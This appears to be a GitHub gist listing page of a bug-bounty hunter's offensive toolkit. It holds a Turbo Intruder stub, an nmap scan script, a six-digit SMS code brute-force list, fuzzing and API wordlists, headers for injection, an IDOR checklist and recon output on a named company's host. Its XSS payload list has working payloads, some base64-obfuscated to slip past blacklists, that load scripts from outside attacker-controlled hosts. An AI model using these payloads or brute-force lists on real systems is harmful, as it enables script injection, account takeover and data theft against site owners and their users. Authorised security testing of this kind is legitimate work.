UYavuz Uyavuz24

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,  # if you increase this from 1, you may get false positives
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )
Uyavuz24 / port-scan.sh
Created December 7, 2020 17:02 — forked from priyanshus/port-scan.sh
NMAP scan for a list of subdomains
#!/bin/bash
#Performs port scan using nmap
print_usage() {
cat << _EOF_
Utility to scan open ports. Can be used to scan ports for a domain or a list of domains specified in a file.
Example Usage:
-h, --help Show brief help
-d, --domain Domain name or ip to scan
-f, --file Specify a file containing domains/IPs to scan
Uyavuz24 / sms.txt
Last active October 29, 2020 00:11
6 digits
This file has been truncated, but you can view the full file.
000000
000001
000002
000003
000004
000005
000006
000007
000008
000009
This file has been truncated, but you can view the full file.
/
!
!=
&&
*
*&
*.*
*?
*?*
.../.../.../
Uyavuz24 / HTTP Headers
Created October 10, 2020 17:35
headers for injection
X-Forwarded-Host:
Host:
Referer:
X-Forwarded-For:
Uyavuz24 / discovery.txt
Last active December 8, 2022 23:57
content discovery
This file has been truncated, but you can view the full file.
/
/*
/*.*
/*?
/*?*
/.../.../.../
/./
//
///
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Uyavuz24 / XSS payloads
Last active October 11, 2020 19:02
there are also descriptions
<iframe srcdoc='<script src=https://myeviljsbucket.s3.amazonaws.com/evilscript.js></script>'></iframe> //When CSP disallows inline JS but allows S3 buckets. The "<script>" tag doesn't work, but there is HTML injection!!
<svg/onload=alert(1)> //this is everywhere
<img src=x onerror=alert(document.domain)> //this is also everywhere
"><script src=https://ubey.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://ubey.xss.ht\';document.body.appendChild(a)') //For use where URIs are taken as input.
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> //For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute.
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> //Another basic payload for when <script> tags
Uyavuz24 / apps.bentley.com.txt
Created August 20, 2020 09:33
wayback crawl
Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3650.0
Uyavuz24 / API Checklist
Last active August 8, 2023 19:33
Our checklist for testing APIs
* If a wordlist can't find anything on the API, use hakrawler
* Every domain could have an API. Add a JSON extension to endpoints and check the response
* If IDs are not numerical, try to find leaked IDs from other places (e.g. posts the user created, and other features)
* Some endpoints will return a UUID in response to an e-mail address, etc.
* If no user ID is leaked, just swap in the user ID of another account you created
* Check permissions on every endpoint
* Change lowercase to uppercase or vice versa in endpoints
* After finding endpoints, run Arjun on them
* Use all HTTP request methods
* Look for IDORs in HTTP headers and body
Uyavuz24 / api_wordlist.txt
Last active March 22, 2024 13:34
api wordlist
/2
/graphql-proxy/admin
/3.0/
/3ds_callback
/3ds_update_payment_callback
/accounts
/active
/activity
/actuator
/actuator/auditevents